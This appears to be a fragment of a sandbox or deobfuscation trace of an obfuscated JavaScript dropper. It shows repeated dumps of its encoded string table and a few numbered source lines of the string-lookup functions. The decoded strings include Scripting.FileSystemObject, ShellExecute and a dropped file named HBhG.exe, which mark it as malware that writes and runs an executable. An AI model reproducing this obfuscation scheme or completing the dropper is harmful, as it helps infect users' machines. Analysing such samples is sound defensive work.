                                                                                                  • _0x2a78() ➔ ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w
                                                                                                  • _0x2a78() ➔ ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w
                                                                                                  • _0x2a78() ➔ ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w
                                                                                                  • _0x2a78() ➔ ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w
                                                                                                  • _0x2a78() ➔ ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w
                                                                                                  • _0x2a78() ➔ ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w
                                                                                                  • _0x2a78() ➔ ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w
                                                                                                  • _0x2a78() ➔ ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w
                                                                                                  • _0x2a78() ➔ EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w,ymkUWO3cOMS
                                                                                                  31
                                                                                                  return _0x4251 =
                                                                                                    32
                                                                                                    function (_0x4251a9, _0xdf85fb) {
                                                                                                    • _0x4251(414,undefined) ➔ "fromCharCode"
                                                                                                    • _0x4251(431,undefined) ➔ "hCktg8kKD8ou"
                                                                                                    • _0x4251(392,undefined) ➔ "WQldKJpcNSkZwCohW7uuzCkoW4i"
                                                                                                    • _0x4251(389,undefined) ➔ "WRCRf8oCW5a"
                                                                                                    • _0x4251(419,undefined) ➔ "FnVtWB"
                                                                                                    • _0x4251(369,undefined) ➔ "EmosWRVcNSolFa1ihmofWPhcNa"
                                                                                                    • _0x4251(397,undefined) ➔ "UGpDBa"
                                                                                                    • _0x4251(429,undefined) ➔ "W5S9W7KHWQtdJMhdSGpcIKnHWPun"
                                                                                                    • _0x4251(373,undefined) ➔ "push"
                                                                                                    • _0x4251(414,undefined) ➔ "233387pUFHvh"
                                                                                                    33
                                                                                                    _0x4251a9 = _0x4251a9 - 0x170;
                                                                                                      34
                                                                                                      var _0x117c39 = _0x2a78ae[_0x4251a9];
                                                                                                        35
                                                                                                        return _0x117c39;
                                                                                                          36
                                                                                                          }, _0x4251 ( _0x5bb6db, _0x386215 );
                                                                                                            37
                                                                                                            }
                                                                                                              38
                                                                                                              function _0x2a78() {
                                                                                                              • _0x2a78() ➔ ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w
                                                                                                              39
                                                                                                              var _0x406d6d = [ 'ymkUWO3cOMS', 'EmosWRVcNSolFa1ihmofWPhcNa', '150UECBKi', 'W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu', '3428070zJPwOJ', 'push', '460031zEcYIe', 'W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44', 'huCPtt7cSW', 'WOatz8o9qCoYWQfjgNhcGsLT', 'charCodeAt', 'open', 'EXVdUmoNWQ0', 'hXuIWQxcSSkWm8khW5/dHCkY', '7728888BzvkvV', 'W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa', 'WP/cHWdcICk+W6CiFCoVWRWwjG', 'W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC', 'bCkhC8onW4FcLI0+WRxcGCkgrG', 'SC!i', 'XaOX', 'WRCRf8oCW5a', '4rmKgck', 'hSkNWP3dMdulzwhcT0e', 'WQldKJpcNSkZwCohW7uuzCkoW4i', '368895bdoymb', 'B@T8', '\x5cHBhG.exe', 'length', 'UGpDBa', '125536oJLPHF', 'k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm', 'kmoTW4ztcXLxhCoX', 'bCokgSoo', 'rSkfWPtcHuXF', 'Scripting.FileSystemObject', 'WRddHhdcKMu', 'ShellExecute', 'mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq', 'WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa', 'W7lcNYddGYNdT8kiorm2WOJdSa', 'cWreW7NdIea', 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=', 'F8kIdw8uWQKJssddISkJW51zcW', 'W67dRx/dVCo6W58', 'WRxcISkFh8o1z8oeC8k8hq', 'fromCharCode', '233387pUFHvh', 'W7FdRgXdW54Tna', 'emk4WPhcOa', 'nvObFWhcVG', 'FnVtWB', '1626000eqHoJP', 'W7KZbhbjW45FW7NdIcfsW4m', 'hLEa', 'QJRI', 'ubKmW5ivxZ9hW6i', 'DbyQW4fCh8kdWOldQmkxWPWz', 'p3(5', 'WRajWQNcSqVcSNa2Bb7dJCkN', 'Open', 'W5S9W7KHWQtdJMhdSGpcIKnHWPun', '54TmlaBs', 'hCktg8kKD8ou', '796884wfZlXM', 'AR2w' ];
                                                                                                                40
                                                                                                                _0x2a78 =
                                                                                                                  41
                                                                                                                  function () {
                                                                                                                  • _0x2a78() ➔ ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w
